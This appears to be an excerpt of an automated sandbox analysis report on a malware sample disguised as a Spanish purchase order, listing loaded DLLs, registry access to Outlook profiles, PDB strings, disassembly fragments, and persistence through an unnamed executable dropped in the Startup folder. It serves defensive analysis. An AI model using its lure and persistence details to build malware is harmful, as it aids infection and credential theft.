Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static file information: File size 1483760 > 1048576

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Accessibility.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Accessibility.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Accessibility.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: RegSvcs.pdb, source: .exe, 00000015.00000000.1532499093.0000000000412000.00000002.00000001.01000000.00000009.sdmp, .exe.13.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: \/.dll.pdb source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1488764594.0000014F10011000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1398908438.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: RegSvcs.pdb source: .exe, 00000015.00000000.1532499093.0000000000412000.00000002.00000001.01000000.00000009.sdmp, .exe.13.dr
Source:	Binary string: System.Configuration.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Xml.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: RegSvcs.exe, 00000009.00000002.1422566777.0000000005210000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1414576707.0000000002A41000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.pdbA source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdbRSDSw source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdb8 source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WER3EB3.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3EB3.tmp.dmp.15.dr

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static PE information: 0x8CAAC51A [Thu Oct 13 20:03:38 2044 UTC]

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146786E push eax; retf	3_2_00007FFB1146787D
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146783E pushad ; retf	3_2_00007FFB1146786D
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB11690002 push esp; retf 4810h	3_2_00007FFB11690312
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB11690002 push esp; retf 4810h	3_2_00007FFB116908FC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_081008BF push 0000005Eh; iretd	13_2_081008C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_081009A7 push 0000005Eh; iretd	13_2_081009AE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0810515B push esp; retf	13_2_08105161
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0810A715 push FFFFFF8Bh; iretd	13_2_0810A720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08170D98 push eax; mov dword ptr [esp], edx	13_2_08170DA4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0817A7E8 push 280811FEh; retf	13_2_0817A7ED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0819C9B8 pushfd ; iretd	13_2_0819C9B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08282C90 push eax; retf	13_2_08282C91
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082A28A0 push FFFFFFC3h; ret	13_2_082A28BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082A6420 push 28082FCFh; iretd	13_2_082A6425
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082AFF1B push eax; mov dword ptr [esp], edx	13_2_082AFF34
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0836D028 push eax; mov dword ptr [esp], edx	13_2_0836D03C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0836BF00 push 18083828h; iretd	13_2_0836BF0D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08361759 push eax; mov dword ptr [esp], edx	13_2_0836176C

Persistence and Installation Behavior

Creates executable files without a name

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
